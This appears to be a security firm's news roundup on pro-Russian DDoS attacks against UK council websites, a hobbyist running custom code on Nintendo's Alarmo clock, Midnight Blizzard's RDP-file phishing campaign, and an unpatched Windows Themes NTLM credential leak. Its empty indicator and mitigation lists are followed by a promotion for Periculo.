.svg)
Local Authority Websites Disrupted Amid Heightened Support for Ukraine
Several UK councils faced widespread website outages this week after pro-Russian cyber actors launched Distributed Denial-of-Service (DDoS) attacks, seemingly in response to the UK’s renewed support for Ukraine. The initial wave of attacks began on Tuesday 29th October, impacting websites for councils in areas such as Bradford, Eastleigh, Keighley, Salford, Tameside, and Trafford. Eastleigh, Trafford, and Salford councils reported continued disruption through Wednesday, with Salford’s site remaining inaccessible into the afternoon, even as it returned with warnings of technical issues.
An updated list of targeted entities, circulated on Thursday, included additional councils and smaller financial institutions. New victims included the council websites of Middlesbrough, Medway, and Hastings, which experienced similar downtimes. Other councils, such as Plymouth and Bournemouth-Christchurch-Poole (BCP), displayed banners indicating site-wide technical difficulties. Notably, Premier League football club Tottenham Hotspur was also affected, with its website returning an Error 500 message.
Coordinated DDoS Effort Led by NoName Group
The pro-Russian group NoName057(16) reportedly orchestrated these DDoS attacks, using instructions communicated via its leadership. Target lists specifying domains and IP addresses are circulated among group members, who then execute the attacks in a coordinated manner. The group justified the latest attacks by citing month-old news stories on the UK’s support for Ukraine, framing these actions as retaliation.
Only two councils—Hastings and BCP—confirmed that DDoS attacks were responsible for the service disruptions. Hastings Borough Council’s deputy leader, Councillor Glenn Haffenden, confirmed that the council had experienced an attack, with the National Cyber Security Centre (NCSC) indicating a likely pro-Russian motive, although the attribution was not definitive.
The NCSC has provided assistance and guidance to affected councils, advising them on mitigating the impact of DDoS attacks. A spokesperson from the NCSC stated that while DDoS attacks are typically low in sophistication and impact, they can nonetheless disrupt services by denying access to legitimate users.
Efforts to Restore Services Amid Ongoing Challenges
Middlesbrough Council’s social media team attributed its website outage to “suspected online hackers,” assuring the public that no data or services were at risk. Similarly, Salford Council’s issues persisted, despite the website being partially restored on Wednesday. On Thursday, Salford Council’s social media account referred to continued “issues with the web pages and maps.”
Notably, none of the councils denied a link between the attacks and their website outages, although few provided details on the technical causes of the disruptions. Eastleigh Council’s issues stemmed from limitations in Azure App Service, while Trafford’s on-site web server reportedly struggled under the strain of incoming traffic, resulting in further outages.
NoName’s Activity
The NoName group is part of a larger set of pro-Russian hacktivists active since Russia’s invasion of Ukraine. Operating through Telegram channels, NoName regularly publishes lists of targets—typically entities perceived as adversarial to Russia’s interests. In previous instances, the group has responded to geopolitical events or arrests of its members by launching attacks on high-profile targets. For example, following the arrest of three alleged NoName members by Spanish authorities in July, the group disabled the websites of major Spanish seaports in retaliation.
While DDoS attacks like these can cause temporary disruptions, their long-term impact on operations remains limited. The FBI has previously commented on the minimal technical effects of such attacks, noting that they tend to produce more psychological than practical consequences. The agency highlighted that pro-Russian hacktivist groups often exaggerate the success of these attacks on social media, aiming to amplify their psychological impact rather than achieve operational disruption.
Rising Threat from Automated Attack Tools
NoName’s DDoSia Project, a tool enabling even unskilled users to participate in DDoS campaigns, currently has over 77,000 followers on its main Telegram channel. This tool automates DDoS attacks, allowing supporters to participate in the group’s campaigns with minimal technical know-how. This amplification of cyber aggression suggests that DDoS attacks may persist as a disruptive threat, particularly for organisations with limited resources to defend against high-traffic attacks.
Hacker Unlocks Nintendo Alarm Clock for Custom Code Execution
A hacker known as GaryOderNichts has successfully breached the security of Nintendo’s recently released Alarmo alarm clock, allowing him to run custom code on the device.
Nintendo’s Alarmo, marketed as a fun way to wake up, is designed with a retro-inspired red, round body and an interactive screen. The device can play sounds and music from classic Nintendo games to help users start their day. The device has gained interest from Nintendo enthusiasts.
Opening the Alarmo required removing a single screw next to its USB-C port, giving access to its internal components. Previously it was discovered that the Alarmo’s Serial Wire Debug (SWD) pins on the circuit board and developed code to access and extract the contents of its embedded multimedia card (eMMC). This eMMC storage includes encrypted game-themed content files, as well as various system files.
Building on these discoveries, GaryOderNichts used a Raspberry Pi to connect to the SWD pins, to exploit a vulnerability within the cryptographic processor’s interface. This enabled him to retrieve the AES-128-CTR encryption key, which is used to secure the Alarmo’s content files. With access to the encryption key, Gary gained insight into the device’s boot sequence, which allowed him to load firmware binaries over USB and run custom code. Which allowed the displaying an image of a cat on the Alarmo’s screen.
Russian Threat Group Uses Sophisticated Tactics to Target Sensitive Organisations
Microsoft’s Threat Intelligence team recently uncovered a significant phishing campaign by the Russian-affiliated threat actor Midnight Blizzard, also known as APT29, UNC2452, or Cozy Bear. Linked to Russia’s Foreign Intelligence Service (SVR), this campaign, launched on October 22, 2024, leverages weaponised Remote Desktop Protocol (RDP) files to conduct cyber espionage across sectors worldwide.
Targets and Methods
This campaign is aimed at various high-profile sectors, including:
Threat actors used highly targeted spear-phishing emails containing malicious RDP configuration files. When victims open these files, they unknowingly connect to attacker-controlled servers, exposing their systems to external control. A hallmark of this attack is the impersonation of Microsoft employees, abuse of cloud service providers’ trusted relationships, and deployment of specialised malware such as “FOGGYWEB” and “MAGICWEB,” both targeting Active Directory Federation Services (AD FS) for unauthorised access.
Attack Tactics and Techniques
Midnight Blizzard’s techniques include credential theft via supply chain compromises, enabling lateral movement from on-premises networks to cloud environments. This has impacted thousands of users in over 100 organisations, primarily in the United States and Europe. CERT-UA (Ukraine’s Computer Emergency Response Team) and Amazon independently verified this campaign, tracking it as UAC-0215. Uniquely, this campaign uses signed RDP configuration files, marking a new tactic in Midnight Blizzard’s espionage efforts, which date back to 2018.
In their phishing campaign, Midnight Blizzard distributed misleading emails impersonating Microsoft, Amazon Web Services (AWS), and Zero Trust security policies. The weaponised RDP files allow for two-way resource sharing, potentially exposing sensitive data such as local hard drives, clipboard contents, peripheral devices, audio systems, and even Windows authentication credentials, including smart cards and Windows Hello.
With this access, attackers can install malware or Remote Access Trojans (RATs) in AutoStart locations, ensuring persistent access even after RDP sessions are terminated. Targets span regions, including the UK, Europe, Australia, and Japan, where attackers used compromised email addresses from legitimate organisations to increase credibility.
System Component Exposure
Through RDP configuration manipulation, threat actors gained access to multiple system elements, including connected network drives, POS systems, and web authentication mechanisms using passkeys and security keys. This broad access allows the attackers to establish comprehensive, persistent control beyond the initial intrusion.
Mitigation Measures
Organisations are encouraged to apply the following mitigations to guard against these types of attacks:
Indicators of Compromise (IoCs)
Sender Domains:
Malicious RDP File Names:
This Midnight Blizzard phishing campaign represents a highly sophisticated approach to cyber espionage, employing RDP files to bypass conventional defences and gain control over critical systems.
Unpatched Windows Theme Vulnerability Enables NTLM Credential Theft
A newly identified zero-day vulnerability in Windows Themes could allow attackers to steal NTLM credentials from affected systems, even after Microsoft’s recent patch (CVE-2024-38030) attempted to address this issue. Acros Security researchers report that Microsoft’s patch falls short of fully mitigating the risk, leaving several Windows versions, including the latest Windows 11 (24H2), still vulnerable.
Background on the Windows Theme Vulnerability
Akamai security researcher Tomer Peled initially discovered that specific Windows theme files containing network file paths could prompt Windows to send authenticated network requests to remote servers. Malicious theme files, when opened from a desktop or folder, could leak user credentials without further interaction, exploiting the system's automatic network request feature.
This vulnerability was initially patched by Microsoft under CVE-2024-21320. However, Peled’s further analysis found that Microsoft’s patch, which uses the PathIsUNC function to block network paths in theme files, could still be bypassed.
Peled notified Microsoft of this bypass capability, leading to a new patch under CVE-2024-38030. Despite this, researchers found that the vulnerability still affects all currently supported Windows versions, including fully updated installations of Windows 11 24H2.
Researchers Develop Independent Patch to Close Security Gaps
To address the vulnerability comprehensively, researchers have created a patch through 0patch’s micropatch service, which is now available for free until Microsoft issues an official update. This micropatch blocks all network requests within theme files, effectively sealing off any paths that could leak NTLM credentials by analysing theme files for potential network references.
The micropatches cover fully updated versions of both legacy and currently supported Windows Workstation systems:
Scope of the Patch and Vulnerability on Windows Server
The vulnerability primarily impacts Windows Workstation systems. For Windows Server environments, the “Desktop Experience” feature must be installed to apply themes, and the theme file must be actively opened to trigger credential leaks. Consequently, no patch was created for Windows Server, as the risk remains minimal without these conditions.
This zero-day vulnerability highlights the importance of secure network path handling within theme files and underscores a gap in current defences. While Microsoft’s patches have attempted to contain the vulnerability, the micropatch by 0patch offers a critical interim measure to protect against credential theft.
Contact Periculo for expert cyber security solutions tailored to the digital health industry.
